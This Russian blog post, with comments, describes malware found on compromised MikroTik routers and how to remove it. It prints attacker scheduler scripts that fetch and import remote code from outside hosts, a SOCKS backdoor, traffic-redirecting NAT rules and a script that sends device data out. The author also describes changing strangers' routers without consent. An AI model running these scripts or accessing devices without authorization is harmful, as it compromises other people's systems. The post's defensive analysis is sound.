Для чего хакерам Микротик и как я спрятал 100 тыс. RouterOS от ботнета

    RouterOS очень мощный инструмент в руках профессионалов и ответственных специалистов. Но в руках новичков или тех, кто делает всё на «и так сойдёт» Mikrotik начинает жить своей жизнью и превращается в ноду ботнета.

    Ещё в мае 2018 я писал статью с рекомендациями как защитить свой Микротик.

    Как ни странно, но в сети до сих пор тысячи «открытых» роутеров Mikrotik и армия ботнета пополняется.

    Я в свободное от работы и отдыха время искал уязвимые устройства по всей сети и делал настройки в соответствии со своими рекомендациями, то есть добавлял правила фаервола, которые закрывали доступ к роутеру не из локальной сети. В комментариях писал информацию об уязвимости и оставлял адрес телеграм-канала @router_os, где можно было мне задать интересующие вопросы (у нормального админа они должны были появиться).



    С мая по сегодняшний день я «вырвал» из лап ботнета более 100 тысяч устройств Mikrotik.

    Учитывая то, что я не могу выступить на MUM 2018 в Москве, то свой доклад я решил опубликовать на habr.com

    В сети много аналитики как именно используются RouterOS хакерами (например здесь). Но моя статья основана лично на моём опыте.

    Админы и их реакция


    По всему миру админы маршрутизаторов рано или поздно обнаруживали у себя такую пасхалку.



    /system note
    /system note print
    show-at-login: yes
    note: I closed the vulnerability with a firewall. Please update RouterOS. You can say thanks on the WebMoney Z399578297824 or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1. My Telegram http://t.me/router_os


    Большинство тихо закрывало дыру. Кто-то не поленились мне написать «спасибо». Но были и те, кто громко негодовал не разобравшись.

    Нормальный специалист должен адекватно реагировать когда ему указывают на его ошибку.


    За всё время мне написало не более 50 человек…

    Так как реакция пользователей была минимальна, то я пришёл к выводу, что подавляющее большинство даже и не заметит, что что-то на роутере не так. Поэтому я стал дорабатывать свой скрипт, который помимо правил фаервола будет удалять известные мне backdoors, которые оставили злоумышленники.

    Логично, что мой метод устраивает не всех. Но другого подхода для выполнения данной задачи я не придумал ещё.

    Хакеры любят RouterOS


    В подавляющем большинстве случаев я попадал на устройство, которое уже кем-то заражено. Я, к сожалению, не сразу стал анализировать их содержимое. Вот что я нашёл и что будет верным признаком, что ваш роутер скомпрометирован.

    Web-прокси и Socks


    Самое банальное использование маршрутизатора через стандартные вэб и socks прокси. Если вы их не используете, но они включены, то просто выключите их.

    /ip proxy set enabled=no
    /ip socks set enabled=no

    Но чтобы просто так не получилось выключить хакер добавляет в шедулер скрипт, которой прокси включит через некоторое время:

    /system script
    /system scheduler
    add interval=10m name="port 54321" on-event="port 54321" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
    start-date=sep/02/2018 start-time=20:35:53
    /system script
    add name="port 54321" owner=gateway policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source="/\
    ip firewall filter remove [/ip firewall filter find where comment ~ \"port\
    \_[0-9]*\"];/ip socks set enabled=yes port=54321 max-connections=255 conne\
    ction-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip \
    firewall filter add chain=input protocol=tcp port=54321 action=accept comm\
    ent=\"port 54321\";/ip firewall filter move [/ip firewall filter find comm\
    ent=\"port 54321\"] 1;"


    Вы можете обнаружить у себя файл webproxy/error.html который прокси вам подсовывает, а он в свою очередь вызывает майнер.

    Лишние параметры появляются и здесь:

    /ip proxy access print
    /ip socks access print


    Script может всё


    В 90% дырявых Микротиков имеются скрипты /system script и для них настроено расписание выполнения /system scheduler.

    По расписанию скачивается скрипт, которой в дальнейшем выполняется.

    Установка майнера
    /system scheduler
    add interval=11h name=upd113 on-event="/tool fetch url=http://gotan.bit:31415/\
    01/error.html mode=http dst-path=webproxy/error.html" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
    aug/20/2018 start-time=03:28:02
    add interval=9h name=upd115 on-event=\
    "/tool fetch url=http://gotan.bit:31415/01/u113.rsc mode=http" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
    aug/20/2018 start-time=03:28:02
    add interval=9h name=upd116 on-event="/import u113.rsc" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
    aug/20/2018 start-time=03:28:12
    add interval=1d name=Auto113 on-event="/system reboot" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
    aug/20/2018 start-time=03:00:00
    /system script
    add name=script4_ owner=nivel2 policy=\
    ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\
    ddress=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http keep-resu\
    lt=no"


    Ещё один вариант скрипта, который после применения пытается частично спрятаться.
    /system scheduler
    add interval=11s name=MTIT on-event="/system script run MTIT" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
    startup
    add interval=25m name="DDNS Serv" on-event="/system script run iDDNS" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
    startup
    /system script
    add name=MTIT owner=admin policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive source=\
    "/ping 10.12.0.26 interface=ether4 count=10"
    add name=iDDNS owner=admin policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive source=":global\
    \_mac [/interface ethernet get 1 mac-address]\r\
    \n:global port ([/ip service get winbox port].\"_\".[/ip socks get port].\
    \"_\".[/ip proxy get port])\r\
    \n:global info ([/ip socks get enabled].\"_\".[/ip proxy get enabled].\"_\
    \".[/interface pptp-server server get enabled])\r\
    \n:global cmd \"/\$mac/\$port/\$info/dns\"\r\
    \n/tool fetch address=91.134.24.238 src-path=\$cmd mode=http dst-path=dns;\
    :delay 3s\r\
    \n/import dns;:delay 4s;/file remove dns"


    Таким образом у злоумышленников всегда есть возможность «скормить» новый скрипт и, например, провести масштабную DDOS атаку.

    Скрипты могут быть спрятаны везде



    Поэтому проверяйте эти места тщательно. На чистом RouterOS эти места пустые.

    DST-NAT


    К моему большому удивлению, но много таких устройств, на которых завёрнут трафик через /ip firewall nat.

    Спам в dst-nat

    /ip firewall nat
    add action=masquerade chain=srcnat comment="default configuration"
    add action=masquerade chain=srcnat
    add action=dst-nat chain=dstnat dst-port=4444 protocol=tcp to-addresses=\
    91.92.128.187 to-ports=4444
    add action=dst-nat chain=dstnat dst-port=8008 protocol=tcp to-addresses=\
    91.92.128.187 to-ports=4444
    add action=dst-nat chain=dstnat dst-address=218.11.2.83 dst-port=8008 \
    protocol=tcp to-addresses=91.92.128.187 to-ports=4444
    add action=dst-nat chain=dstnat dst-address=218.11.2.83 dst-port=443 \
    protocol=tcp to-addresses=91.92.128.187 to-ports=4444
    add action=dst-nat chain=dstnat dst-address=218.11.2.83 dst-port=25 protocol=\
    tcp to-addresses=91.92.128.187 to-ports=4444
    add action=dst-nat chain=dstnat dst-address=51.15.39.52 dst-port=9999 \
    protocol=tcp to-addresses=91.92.128.187 to-ports=4444
    add action=dst-nat chain=dstnat dst-address=51.15.39.186 dst-port=9999 \
    protocol=tcp to-addresses=91.92.128.187 to-ports=4444
    add action=dst-nat chain=dstnat dst-address=51.15.89.69 dst-port=9999 \
    protocol=tcp to-addresses=91.92.128.187 to-ports=4444
    add action=dst-nat chain=dstnat dst-address=79.137.82.70 dst-port=9999 \
    protocol=tcp to-addresses=91.92.128.187 to-ports=4444
    add action=dst-nat chain=dstnat dst-address=79.137.82.104 dst-port=9999 \
    protocol=tcp to-addresses=91.92.128.187 to-ports=4444
    add action=dst-nat chain=dstnat dst-address=92.222.72.197 dst-port=9999 \
    protocol=tcp to-addresses=91.92.128.187 to-ports=4444
    add action=dst-nat chain=dstnat dst-address=92.222.180.118 dst-port=9999 \
    protocol=tcp to-addresses=91.92.128.187 to-ports=4444
    add action=dst-nat chain=dstnat dst-address=151.80.59.84 dst-port=9999 \
    protocol=tcp to-addresses=91.92.128.187 to-ports=4444


    Хороший способ скрыть свой реальный ip.

    VPN


    Как же без него. RouterOS умеет подымать различные виды vpn, но хакеры чаще всего используют pptp и L2TP.

    Поэтому проверьте раздел /ppp secret

    Даже если этот раздел пуст, то ушлые хакеры могут авторизоваться и через Radius.
    Проверяем наличие записей /radius print
    Если вы ничего не настраивали, то там должно быть пусто. В противном случае стоит очистить:
    /radius remove numbers=[/radius find ]
    И запретить использовать Radius
    /ppp aaa set use-radius=no use-circuit-id-in-nas-port-id=no
    Отключаем использование Radius для авторизации на устройстве
    /user aaa set use-radius=no

    Если вы не используйте vpn, то отключите его
    /interface l2tp-server server set enabled=no
    /interface pptp-server server set enabled=no
    /interface sstp-server server set enabled=no


    DNS static


    Без фишига так же не обошлось. На роутерах в /ip dns static можно обнаружить и такое


    Всё очень просто: вы в адресную строку вбиваете адрес сайта, который вы знаете, а фактически попадаете на сервер злоумышлинника.

    Удаляем содержимое

    /ip dns static remove numbers=[/ip dns static find]

    Урезание прав админа



    UPD: Так же есть группа роутеров, где хакер урезал права у admin и завёл своего с полными правами (например router и cnt), либо просто отбирает права и обновляет прошивку на последнюю.



    содержимое /user в первом случае
    [router@MikroTik] > /user print
    Flags: X — disabled
    # NAME GROUP ADDRESS LAST-LOGGED-IN
    0 ;;; system default user
    admin admin sep/18/2018 15:08:45
    1 dima full sep/14/2018 19:54:00
    2 router full sep/26/2018 09:23:41

    [router@MikroTik] > /user group print
    0 name=«read» policy=local,telnet,ssh,reboot,read,test,winbox,password,web,sniff,sensitive,api,romon,tikapp,!ftp,!write,!policy,!dude skin=default

    1 name=«write» policy=local,telnet,ssh,reboot,read,write,test,winbox,password,web,sniff,sensitive,api,romon,tikapp,!ftp,!policy,!dude skin=default

    2 name=«full» policy=local,telnet,ssh,ftp,reboot,read,write,policy,test,winbox,password,web,sniff,sensitive,api,romon,dude,tikapp skin=default

    3 name=«admin» policy=local,ftp,reboot,read,write,test,winbox,password,web,sniff,sensitive,api,!telnet,!ssh,!policy,!romon,!dude,!tikapp skin=default


    Как вариант решения этой проблемы: через netinstall сделать downgrade на уязвимую прошивку и воспользоваться эксплоитом.

    Packet Sniffer


    Коллеги из Лаборатории Касперского упомянули кражу трафика по средствам его перенаправления на неизвестный узел.

    Выключить его можно так:
    /tool sniffer stop
    /tool sniffer set streaming-enabled=no filter-ip-protocol="" filter-port="" filter-interface="" filter-stream=no


    Проблема продукции Mikrotik


    Абсолютно защищённых систем не существует. А массовое распространение продукции Mikrotik так же повлекло массовое изучение этих устройств.
    Так как функционал RouterOS позволяет выполнять огромное количество задач он интересен и хакерам в том числе.

    Из-за того, что продукт очень динамично развивается, то и скорость появления новых «дыр» тоже велико. Не смотря на это компания Микротик оперативно выпускает заплатки для своих систем.

    Выход


    На сегодняшний день единственным верным решением для защиты RouterOS — это корректно настроенный фаервол, который работает по принципу «запрещено всё, что явно не разрешено».
    А всё потому, что Микротик использует классический фаервол Linux, который годами оттачивался армией специалистов.

    Если требуется доступ к устройству из глобальной сети, то используйте принцип "port knocking". Принцип «fail2ban» себя не всегда оправдывает, так как всё равно обнаруживает устройство.

    Глобальные решения


    Режим ламера


    В виду того, что устройства очень дешёвые, то их покупают пользователи, которые не имеют специальных знаний. Компании Mikrotik необходимо разработать интерфейс «ламера», который имеет минимальное количество настроек как и большинство SOHO роутеров. Причём он должен быть по умолчанию. А расширенный режим пользователь должен включить осознано сам. Текущий «Quick set» не достаточно хорош. Более того из-за изобилия кнопок юзер может и не заметить эту функцию.

    Bug analyzer


    Так же необходим модуль, который проводит анализ текущей конфигурации на возможные уязвимости и уведомляет пользователя, если считает, что роутер может быть скомпрометирован. Этот модуль должен подгружать «базу знаний», которую наполняют сотрудники Mikrotik на основании распространённых ошибок. А в случае серьёзных уязвимостей включать «аварийный» режим.
    Если я смог систематизировать часть угроз, то разработчики и подавно…

    FireWall — как услуга провайдеров


    Рынок «умных» устройств очень бурно развиваются и они далеко не все хорошо защищены. Большинство людей, которые их приобретают, так же не владеют специальными знаниями, чтобы самостоятельно защитить свои гаджеты.

    Поэтому интернет провайдерам пора создать коммерческую услугу по защите таких гаджетов. Банально пользователь в личном кабинете указывает какие порты открыть из интернета.
    Так же провайдеры могут создать централизованную базу по существующим устройствам и их нормальным потребностям. Пользователь указывает в ЛК какие устройства у него используются. В случае нестандартного поведения такого устройства — уведомлять пользователя.
    Я считаю, что рынок уже созрел для такой услуги.

    В этой услуге есть следующие плюсы:

    1. Для провайдера ещё одна статья дохода
    2. Сокращение паразитного трафика
    3. Сокращаем рекрутинг устройств в ботнет
    4. Популяризация развивающихся услуг «умный дом»
    5. Пользователи могут дальше не заморачиваться своей безопасностью.

    Немного о себе


    Попытаюсь ответить на вопросы, которые наверняка мне зададут.

    1. Я работаю на должности не связанной с Mikrotik и сетями в общем.
    2. Тем не менее у меня есть сертификат MTCNA.
    3. Микротик — моё хобби. Всё, что я делаю — мне просто нравится. Так сказать «по фану».
    4. Почему не устроился на работу по профилю? Те кто в нашем городе покупает mikrotik много платить ЗП не могут. Те, кто может мне платить достойную ЗП — покупают cisco.
    5. В комментах в фаерволе я указывал свои кошельки, но с мая мне закинули всего около $40. В телеграм писали из разных стран, мол у них нет wmz, но всё равно «спасибо».

    P.S.:


    Поделитесь вашим опытом как ещё хакеры могут использовать Mikrotik.

    Only registered users can participate in poll. Log in, please.

    Ломали ли хоть раз Ваш RouterOS?

    Support the author
    Share post

    Similar posts

    AdBlock has stolen the banner, but banners are not teeth — they will be back

    More
    Ads

    Comments 114

      0
      Вообще, хочу отметить, как показала практика — Mikrotik весьма неоднозначное решение. С одной стороны большой функционал, за вменяемые деньги. С другой, «физические» нагрузки для этого железа недопустимы.

      Инженерный дизайн устройств — прост как две палки, как следствие, все вопросы решает софт. Именно поэтому — даже простые реализации в среднем бизнесе довольно быстро выталкивают эту марку «за борт» — нагрузки в направлении шифрования VPN или фильтрации траффика ставят «на колени» многие модели этой марки.

      Попытки компенсировать установкой деталей большей мощности и объема — дают передышку, но это напоминает увеличение толщины броневого листа на танке, до тех пор пока не появятся кумулятивные заряды.

      К тому же покупая один Mikrotik, всегда — это факт, надо брать второй, на случай отказа оборудования и все время вести актуальный лог конфигураций (архив). Не затрагиваю тему SOHO реализаций, т.к. разброс ± очень большой.
        –12
        IMHO n0p.me/winbox-bug-dissection — это все, что нужно знать о продукции микротик. Внимательно прочитать, оценить цепочку «случайностей», подумать над What did we Learn? и закрыть для себя вопрос раз и навсегда.
          +3
          Напишите список производителей, у которых не было критических багов.
            –3
            Не напишу т.к. я не с планеты админов. Однако, поясню, что же именно вызвало мое бурное удивление в обсуждаемом случае с микротиком.

            Это не ошибка в реализации протокола. Да, на кой хрен было воять свой бинарный православный протокол когда есть \<you name\> — а и черт с ними. Наваяли и ладно. Это конечно с самого начала попахивает бомбой замедленного действия но вдруг прокатит (непрокатило).

            Меня удивило то, в каком виде маршрутизатор хранит критически важную информацию. А именно — практически в plain text без шифрования.

            Decoding the User Database

            Now we can read ANY file from the Router! Which files are useful? In our previous talk on APA3 conference, we talked about just how insecure Mikrotik is, especially when it comes to handling credentials. In short, Mikrotik uses a very weak encoding (no hash and salt) to store passwords to an index file. So it’s entirely possible to download the credential database and extract every username and password stored inside it and that’s exactly what we did for this PoC.

            After downloading the idx file, we used another great tool from mikrotik-tools to decrypt the username and password database and dump everything IN PLAIN TEXT !!!


            Это было известно разработчикам. Это было известно широкой публике. Последняя разработчиков об этом предупреждала. Мол рано или поздно вам наступит хана. Они судя по всему на это забили большой болт и продолжают хранить информацию в плейне.

            Вот этот момент заставляет мой мозг зависнуть. Так просто не может быть! О неверных правах доступа на /etc/shadow с последующим восстановлением паролей из-за кривого крипта и организации атак я впервые читал как минимум лет 20ть назад. Тогда это было популярно. Но черт возьми, господа, на дворе 2018й год! И что, никогда небыло и вот опять? Это с моей точки зрения за пределами добра и зла. Веры тем, кто сегодня сознательно разрабатывают такие системы, нет ровным счетом никакой. Вне зависимости от остальных ТТХ какими бы хорошими они ни были и сколько бы они не стоили.
              +2
              Вы (и автор приведённой цитаты) смешиваете шифрование и хэширование. В контексте паролей есть всего два принципа: PAP и CHAP. По первому передаётся пароль, а хранится может признак (хэш). По второму передаётся признак пароля (хэш), но хранить нужно непосредственно пароль.
              Так вот: слать непонятно куда пароли в явном виде — дурная затея (это не вэб-сайт, который может быть защищён сертификатом от подмены), а раз так остаётся только вариант хранить пароли и передавать признак знания пароля.
                +1
                Что нисколько не мешает ребятам передавать пароли от пользователя через ssh, веб и, черт возьми, телнет. Храним пароли в плейне на маршрутизаторе ради своего наколеночного решения? Интересный подход.
                  –1
                  А ещё можно хранить хеш пароля, а передавать… тоже хеш пароля! И их между собой сравнивать.
                    0
                    Это просто подмена понятий. Нет разницы между паролем и хэшем пароля -это фиксированная последовательность байт, которая открывает доступ. Хэш сам по себе толком ничего не даёт, его надо солить.
                    CHAP упрощённо, это когда сервер передаёт пользователю соль, а обратно получает хэш посоленого пароля.
            +3
            Вообще по стабильности и функциональной нагруженности аналогов нет. Падать железки у меня не падали. Точнее были проблемы, когда создавались списки адресов из нескольких сотен тысяч записей. Пришлось их оптимизировать масками :)
            С VPN вообще никакими проблем не наблюдал. Наверное я не правильно что-то делаю.
            Актуальный лог конфигурации вести очень не сложно. У меня есть скрипт, который умеет собрать конфигурацию и отправить как вложение на специальный почтовый ящик (gmail к примеру).
            По обновлению софта — проверка стоит по планировщику. Тоже скрипт. В случае нахождения обновления софта собирается текущая конфигурация, собирается релиз нотес с обновления и все вместе высылается на почту. После этого можно идти на железку и обновлять ее, точно понимая что конфигурацию ни при каких проблемах не потеряешь.
              +3
              Я как чувствовал, появление такого комментария вопрос времени :)

              К сожалению, из Вашего комментария, не могу понять, что из этого списка — mikrotik.com/products установлено, на какое количество соединений в единицу времени, какие типы протоколов и количество/характеристики правил на firewall-e. Нюансов — черт ногу сломит. Потому как если «коробка» за 400 евро спокойно держит 5 человек — такое утверждение имеет место быть.

              В целом, считаю, спорить смысла нет. Просто ставим железо, настраиваем и наблюдаем за результатом.

              Также стоит отметить сложность логики в настройке устройства, особенно для тех, кто не часто сталкивается с ними.
                0
                Давайте пример: Маршрутизатор Mikrotik RB3011UiAS
                Канала в интернет ~150Мбит
                Пользователей(dhcp): ~ 100 человек + мобильные устройства через точки wifi ~ 50 штук
                Правил в фаерволе: 40-50
                Тунели(PPTP\l2TP): 3-и постоянных, + около 20 человек могут поднимать для работы из дома.
                В среднем нагрузка на CPU в течении рабочего дня 10%
                  –2
                  А где пример? Это описание того, что есть, а что из всего этого работает в реальном времени. Я же написал, цитирую: «какое количество соединений в единицу времени, какие типы протоколов и количество/характеристики правил на firewall-e».

                  Если сидеть читать почту и просматривать web контент, то 10% слишком много :)

                  Ладно. Берем это — www.markit.eu/ee/ru/mikrotik-cloud-core-router-ccr1036-8g-2s-router/v2p8038080c150102 или www.markit.eu/ee/ru/watchguard-firebox-m200-high-availability-security-appliance-8/v2p10600071c150802

                  Причем последний гарантировано тянет 1500 человек (единовременно), канал подключения 300 Мбит/с (выделен только под него, общий канал 1 гбит/с), параллельно в день от 100 до 250 VPN IPSec соединений (удаленные станции и лаптопы пользователей). Вот сколько еще проходит гостевых соединений — не скажу, понятия не имею, вообще это все отдельно висит в невысоком приритете, затычек точно не было :)

                  На канал в 1 гбит стоит Extreme Networks решение, двойное (единовременно от 3500 до 6000 конечных устройств, количесто соединений — не скажу, врать не буду). Работают в паре, на случай сбоя одного из них. Честно, при таком расладе, ставить Mikrotik — даже в голову не пришло как-то :)

                  Все свичи либо Extreme, либо Netgear Ent. — пример только одного учереждения, конечно где-то больше, где-то меньше. Но суть статьи — взлом это плохо! Я хочу сказать, это будет в сотни раз хуже, если это решение отвечает еще и за корпоративную инфраструктуру.

                  В качестве дополнения, обратите внимание, никогда Mikrotik не будет ручаться за производительность устройства с настроеным firewall-ом (UTM, IPS, антивирус — если они конечно у вас есть :) ), все время сноски с пояснением «зависит от конфигурации». Откройте любое руководство Watchguard или Extreme Network, да даже Netgear (тут, справедливости ради, не всегда) — но прописана гарантия скорости, сколько не ковыряй настройки (откровенный хардкор не в счет).

                  Канализация большая не потому что сейчас много народу сидит на унитазах, а потому, что когда все сядут… то тут получается ситуация несколько иная, потому как пример имеет место быть только в SOHO и small-business.

                  Нормальный middle и high — всегда работат в пике возможностей.

                  Всем хорошего дня!
                    0
                    Жаль, я пока минусить не могу, тоже бы минуснул… ваши примеры стоят ровно в 3 раза дороже 3011.

                    В ваш ценник отлично вписывается CCR1009, у меня он стоит в продакшене в Дата-Центре, обслуживает около 100 клиентов.

                    На текущий момент 30 000 соединений, 15 IPSec туннелей, 250 правил firewall и 200 правил NAT, не считая Mangle и 3х BGP-сессий, загрузка процессора 25%, загрузка оперативной памяти 28%.

                    По поводу пропускной способности — не заставляйте меня, вместо вас, лезть в гугл за статьёй, где человек поставил клиенту циску, а у клиента уже были микроты и когда подняли туннели, упёрлись в производительность циски, т.к. не был куплен модуль аппаратного шифрования за 20килорублей, а микроты там стояли 1100, по цене 18к рублей и с распаянными чипами аппаратного шифрования.
                      0
                      Ну не упустите возможность, когда появится. И можете особо не утруждать себя поисками в интернете подобных вещей или устраивать на эту тему holy-war полемику.

                      Особенно, когда в вашем комментарии, я ни слова не заметил про услугу поддержки железа, которая является категорически важным элементом. Я еще не помню, предприятие, представляющее Mikrotik, которое имело бы, при покупке устройства, SLA по поддержке и обслуживанию.

                      Составляя проект, в разрезе 3-4 календарных лет, учитываются подобные нюансы, но я вижу, что подобным Вы не занимались. При таком раскладе не преследуется интерес выиграть ничтожное количество денег, в единовременной оплате первичного договора/покупки. А далее что? Надеется, что вам достался именно тот вариант, который без сбоев и брака протянет 10 лет в стойке? Лотерейка?

                      Я считаю, что Микротик не может быть, по определению, частью цепочки важной инфраструктуры. Я знаю, что все вопросы данное решение делает только за счет ПО и имеет минимальную оптимизацию под то железо, на котором построено. Это факт, почитайте.

                      Также, я вижу, что недовольны только те, кто не имеет возможности поставить не «бюджетное» решение — но я тут причем? Если вы вынуждены ставить Микротик, а я тут такие вещи говорю — конечно, «минусить» можно, а смысл? Что это даст? Я же не призываю выкинуть его, весь комментарий — метода довести до людей, что при отвественном отношении, экономия при выборе непрофессионального инструмента, в серьезном делопроизводстве, может повлечь расходы — время/деньги.

                      Если — это не так важно, тогда вообще не понятно — о чем спор?

                      В конце-концов, я тоже на своей машине с прицепом могу привезти на участок нужное количество земли. НО! Если это сделать на самосвале, то моя экономия денег/времени, что я трачу на загрузку/выгрузку своего прицепа, количества топлива, что потрачено на поездки туда/обратно, на возможный ремонт прицепа/машины после такого пробега — будет оптимальной. Несмотря на то, что за услугу придется платить чуть больше, но — это с экскаватором, фильтрацией земли от камней и здоровой спиной :)

                      Хорошего дня!
                  +3
                  В любом таком обсуждении куча нюансов.
                  Если говорить про настройку — она сопоставима с CISCO, как, в принципе, и функционал.
                  По крайней мере потребности сегмента SOHO покрываются с хорошим запасом.

                  Понятно что рядом с серьезными Blade системами решения микротика будут смотреться не очень уместно, тем не менее возможности железок более чем достойные.
                  0
                  Скажем так, Mikrotik — компромисс. VPN у него в части реализации не допилен, и если не надо шлюзовать человека через себя, то встаёт вопрос о dns-masq, которого нет. В результате при подключении не дают пуши роутингов клиенту и он не знает внутренних адресов. Насколько знаю, это не решено по сей день. У себя решили административно, т.е. есть файл для рукастых, который кормится в этот момент.

                  Точно не помню, но и с FreeRadius есть кое-какие затыки (вроде с группами, врать не буду).

                  Есть ещё вопросы и по бэкапу. Нет, он делается, но ловил себя на том, что не каждый восстанавливается в случае сложной конфигурации. Причём он делался корректно.
                  +1
                  Склонен с вами не согласиться. Просто не надо ожидать от этих устройств всего сразу и бесплатно. Да, они очень хороши за свои деньги и аналогов за эти деньги нет. Да, есть железки быстрее и дороже, и, опять же, у Микротика они тоже есть.

                  Нужна определённая функция? Она есть. Нужна высокая скорость? Нужно, чтобы была аппаратная поддержка в конкретной модели. То же самое с Vlan, фильтрацией и т.п.
                  То, что каждое устройство может всё, не значит, что все функции стоит настраивать на одном устройстве (в чём, собственно и главная прелесть сети — её отлично можно масштабировать горизонтально). Ну или смириться, что скорость будет далеко не максимально-возможной. И опять же, учиться, учиться и ещё раз учиться — входной порог невысокий, нюансы есть, разной степени важности, и многие дают большой прирост именно по скорости. И при правильной настройке и знании особенностей железа вполне получается выжимать WireSpeed на весьма недорогом оборудовании.

                  Ну и услышал бы предложенную альтернативу, раз уж… По свичам, например, когда я искал 24 порта с изоляцией — либо UBNT, либо в разы дороже, либо неизвестной стабильности типа level1
                    0
                    Вот тут согласен, но у нигде не писал, что ожидал от этого решения «всего и сразу». к счастью много опыта, максимум, чт оя могу от Mikrotik ожидать — это сносной работы точек беспроводного доступа в небольшой конторе.

                    «Да, есть железки быстрее и дороже, и, опять же, у Микротика они тоже есть» — вот это и есть отсыл к наращиванию брони.

                    «о, что каждое устройство может всё, не значит, что все функции стоит настраивать на одном устройстве» — согласен, но когда вы последний раз видели, чтобы покупая в организацию Mikrotik, человек что-то упорно маштабировал? Да почти никогда, в 90% покупают «кухонный комбайн», потому что может :)

                    «вполне получается выжимать WireSpeed на весьма недорогом оборудовании» — это при относительной небольшой нагрузке со стороны firewall-a (это как один из вариантов).

                    Насчет альтернатив:
                    • Aruba/HP, Ruckus (при планировании беспроводных решений)
                    • Extreme Networks, HP, Cisco, Netgear (свичи, роутинг)
                    • Fortinet, Watchguard, Cisco (защита)


                    Ничего экстраординарного. Просто, ожидаю комментария по поводу стоимости, но тогда мы вренемся к пункту «все сразу и за дешево» :)
                      0
                      В общем, могу сказать, что по свичам их 326я линейка весьма неплоха, с одной стороны, но с другой — надо учиться готовить, кто б сомневался. Но правила на портах есть и работают со скоростью порта. Собственно, альтернатива наращиванию брони.

                      Ну и минус — железо по большей части у микротика ничерта аппаратно не делает, тот же 750gr3 — натить умеет быстро, гигабит с загрузкой около 40% делает, но не умеет аппаратно vlan и bonding, из-за чего приходится изголяться. В общем и целом — с внешним миром общаться скоростей хватает, а внутри — приходится изголяться, если больше гигбита хочется.

                      Ещё могу сказать, что микротик 2 года назад, сейчас и 5 лет назад — это совершенно разного уровня продукты. 5 лет назад они были на уровне линксиса с зюкселем, а сейчас их не стыдно со списком выше сравнить (ну да, хуже, кто ж спорит). Да и броня у них такая же, просто она не афишируется)

                      Ну и как-то очень уж оно Linux-Way…
                      0

                      А что не так с ubnt?

                      +3
                      И всё-таки дырявость «из коробки», пусть даже за «не дорого» это очень плохо. Сразу складывается стереотип — микротик это боль и плохо. Даже если потом компания решит поменять стратегию и начнет клепать девайсы таки с заштопанными дырами. Снять клеймо «плохого вендора» будет охх как не легко.
                        0
                        «Из коробки» известных дырявостей нет, т.к. на WAN порту стоит файервол.
                          0
                          «Из коробки» input drop есть только на ether1, а не вообще на WAN.
                          Любой другой логический интерфейс, поднятый через ether1, «из коробки» уже открыт всему миру.
                            0
                            «Из коробки» на первом порту в простых моделях прямо написано: Internet.
                            Картинка
                            image
                            Что не даст рядовому пользователю промахнуться на этапе подключения. Если это бизнес — железка обычно настраивается до ввода в эксплуатацию на критический объект, а не после.
                              0
                              Если на нем висит логический интерфейс, т.е. pptp, pppoe и пр., то по-умолчанию он будет открыт для всех.
                              Могу ошибаться по поводу поведения Quick Setup в различных версиях ROS, но во многих случаях правила в nat POSTROUTING и filter INPUT надо было добавлять руками.
                              Так что, даже если Mikrotik настраивается для применения в качестве домашнего роутера, изменения, внесенные Quick Setup-ом, надо перепроверять, а лучше все правила создавать руками.
                                0
                                Ну так верно. А если создавать руками перед введением в эксплуатацию — значит тезис про его незащищённость «из коробки» нивелируется.
                              0
                              Никакой другой логический интерфейс «из коробки» не настроен, а, следовательно, абсолютно безопасен, т.к. не существует.
                            0
                            Много чего было и есть дырявого «из коробки», вы никогда об этом не узнаете, пока не сломают. Хуавей некоторые свои железки даже латать не собирается (ибо старые). С Микротиком другая особенность — «из коробки» он требует предварительной настройки даже в случае с типа домашним роутером hAP ac2.
                            Вот прям сразу надо идти на wiki.mikrotik.com/wiki/Manual:Securing_Your_Router
                            и вдумчиво делать то, что там написано. Другое дело, что им может быть лучше продавать свои роутеры с отключенным и закрытым всем (включая даже доступ для winbox), кроме вебморды c внутренней сети.
                              0
                              99,9% не будут читать wiki, в том числе и я — кроме желания, на это нужно время — много времени. Чтобы понять всё что там написано, опять же нужно перечитать кучу доков. Сейчас всем нужно — распаковал, настроил и забыл. Внутреннюю сеть, кстати тоже бы закрыть не мешало. «Из коробки» оставить только входящие из LAN https/ssh. Исходящие — рубить все, надо будет — настроят, в том числе NAT, визардом в пару кликов. Плюс такого подхода — запрещено всё что не разрешено. К сожалению далеко не все вендоры так делают. Та же самая Cisco — не следует такому принципу, хотя в PIX-ах или ASA-x замечал последнее правило, рубящее все.
                          +3
                          > Я в свободное от работы и отдыха время искал уязвимые устройства по всей сети и делал настройки в соответствии со своими рекомендациями, то есть добавлял правила фаервола, которые закрывали доступ к роутеру не из локальной сети.

                          Чтобы «сделать настройки в соответствии со своими рекомендациями» необходимо получить удаленный контроль над устройством. Просто так, даже не смотря на то что это добрый микротик, устройство вам его не даст.

                          Правильно ли я вас понимаю, что вы фактически взламываете устройство используя например феерический CVE-2018-14847 и удаленно изменяете его настройки? Естественно без ведома хозяина устройства.

                          Если догадка верна у меня только один вопрос: вы не боитесь, что рано или поздно вас могут неправильно понять? С потенциально самыми разными последствиями. Не факт что приятными.
                            +4

                            Вот да, мне тоже интересно, о чём думает автор когда мало того, что занимается этим, так ещё и отписывается об этом в статье. Я лично считаю что таким активистам ещё и приплачивать надо, но формально по закону, скорее всего, их можно сажать. И наверняка найдётся какой-нибудь местечковый прокурор, который увидит в этой статье лёгкий способ получить лишнюю "палку" заведя дело на автора.

                              +1
                              Не совсем так. Должен быть ущерб — материальный или моральный. Ну или, как минимум, конкретная статья, предусматривающая наказание. А без этого дела не завести.
                                0
                                Вмешательство в работу сетей, вроде во всех цивилизованньіх законодательствах такая статья есть.
                                  0
